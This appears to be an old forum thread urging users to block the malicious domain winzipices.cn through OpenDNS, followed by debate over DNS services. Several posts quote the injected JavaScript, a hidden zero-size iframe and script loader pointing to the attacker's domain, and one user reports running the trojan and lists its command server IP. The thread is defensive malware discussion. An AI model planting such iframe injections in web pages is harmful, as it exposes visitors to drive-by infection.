Use OpenDNS to block winzipices.cn

By Jonathan Yaniv
in Back Page News

 Share

Recommended Posts

Grand Master

+Mystic MVC

Posted
  • MVC
Posted
You just go into your Network adapter settings, click properties, change the DNS server address, reboot your computer.

Thats the simpliest way

If you have a router, change the DNS servers of your router.

Its really easy..

http://www.opendns.com/start

The technology they use is simply amazing.. and it keeps getting better every day. Each day I hear about new improvements or ideas to the backend and frontend of OpenDNS and they are just simply amazing.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

Grand Master

The_Decryptor Veteran

Posted
  • Veteran
Posted
No offense but how? How would this be different from using my ISP's? Can't I already block/filter out tons of stuff with my router?

It's probably be slower than your ISP (It's about 20 times slower than my ISP's DNS server)

I just use dnsmasq (on my WRT54GL) myself.

Explorer

Jonathan Yaniv

Posted
  • Author
Posted

Does anyone have any details on the malware itself? What browsers does it affect? What exactly does the malware do, etc? Or better yet, can someone upload the actual malware someplace?

The script being injected is winzipices.cn / 2.js (added space so people dont accidently go here) - DONT GO THERE, EVEN THOUGH ITS A JS FILE

The stuff in that JS file (2.js) is this:

document.write("<iframe <iframe src=http://winzipices.cn/2.asp width=0 height=0></iframe>")

5.js is this

if (navigator.systemLanguage=='zh-cn')

{

}

else{

document.write("http://winzipices.cn/5.js");

}

document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1856986.js"></script>');

"You're already blocking winzipices.cn.

You're blocking Adware sites. This category includes winzipices.cn."

Looks like OpenDNS has already added it to the Adware list.

I am a moderator for OpenDNS and i have added it to the Adware category. Thats why.

Explorer

Jonathan Yaniv

Posted
  • Author
Posted
I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

Ahh, this took me a while to figure out. Ok, this makes sense

You are using your WRT54G basically as a DHCP server which uses ad-hoc, the default gateway of your router points to the IP address of your modem. The DNS settings of your router will be the address of your modem. Therefore, if you are able to change the DNS server address of your modem, that would be fine.

But if you dont feel comfortable doing it.. dont.

I dont think it would mess up your setup.

Explorer

Jonathan Yaniv

Posted
  • Author
Posted
I already use OpenDNS, but as an extra precaution added the listed domains and IP addreses at the SANS site into my router's block-list.

--ScottKin

That works too.

I (Personally) just blocked all access to any .cn site.

I cant read that language.. so I have no use for those kinds of sites.

Proficient

[deXter]

Posted
Posted (edited)

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to manually find the links to the actual malware. Seems one needs to have realplayer installed for it to download and execute automatically. Tested the actual malware- it's a trojan that receives and executes instructions via a config file. At this point of time, it didn't seem to perform any malicious commands as the config file didn't contain any. It just downloaded a second file which makes requests to 61.134.37.15:1800.

I'll get RP later and see if I can manage to get the trojan to auto-execute.

--

Btw, I highly recommend blocking 61.134.37.15 and 61.188.38.158 , in addition to winzipices.cn

A good news for AV users is that the majority of them have already added this to their database- except McAfee, Avast and ClamAV.

http://www.virustotal.com/analisis/4e5fead...dea811ea5e41d0b

Edited by [deXter]
Explorer

Jonathan Yaniv

Posted
  • Author
Posted

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to find the links to the actual malware. Seems one needs to have realplayer installed for it to run/execute automatically.

Interesting..

I havent personally tested it, as i dont want to get the malware, lol.

Proficient

[deXter]

Posted
Posted

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

Explorer

Jonathan Yaniv

Posted
  • Author
Posted
I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free is my main questions? Sounds interesting. :)

Difference in page / site load time due to its very large DNS cache

More secure.. you can block adware category, so no more adware sites will ever load.. a malware category is coming soon btw.

Block porn sites too.

Block suspicious responses

Typo corrections

Network shortcuts

OpenDNS keeps it free cause they get revenue from the ads they have from Overture running on the guide / search pages.

Also, they do have paid features, for business who need extra features, but OpenDNS cant provide those for free. and i mean the really big businesses.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

Explorer

Jonathan Yaniv

Posted
  • Author
Posted
I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

OpenDNS has servers situated strategically at the most well-connected intersections of the Internet. Unlike your ISP, our network uses Anycast routing technology, which means no matter where you are in the world your DNS requests are answered by our closest datacenter. Anycast routing also means that you are automatically routed to our next closest datacenter in the event of maintenance or downtime. This makes your Internet faster and more reliable.

network_map.gif

How we're faster: We have really large caches

Most DNS servers have a small cache. We operate the largest caches in the world (and on the Internet, size matters). This means when you type a website into your address bar, the site loads immediately, instead of making you wait for a small cache to find the answer.

cache.gif

Grand Master

The_Decryptor Veteran

Posted
  • Veteran
Posted

my ISP's DNS server is one hop away and can return uncached entries in around 10ms. That's still not going to make my connection faster though.

And OpenDNS caches are going to expire at the same time as my ISP's caches, unless OpenDNS is ignoring the TTL.

Proficient

[deXter]

Posted
Posted (edited)
DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

Maybe, but that doesn't change the fact that they're way faster than OpenDNS (for me). I'm quite surprised that despite being around for so many years, they have such few servers (5, 1 upcoming), while DNS Advantage has so many (14, 3 upcoming).

Node_locations.png

--

Also, I fail to see how OpenDNS's servers are "situated strategically", considering the fact that most of them ('cept one) are located in the US -_-

In any case, a little bit of competition never harmed anyone :)

Edited by [deXter]
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.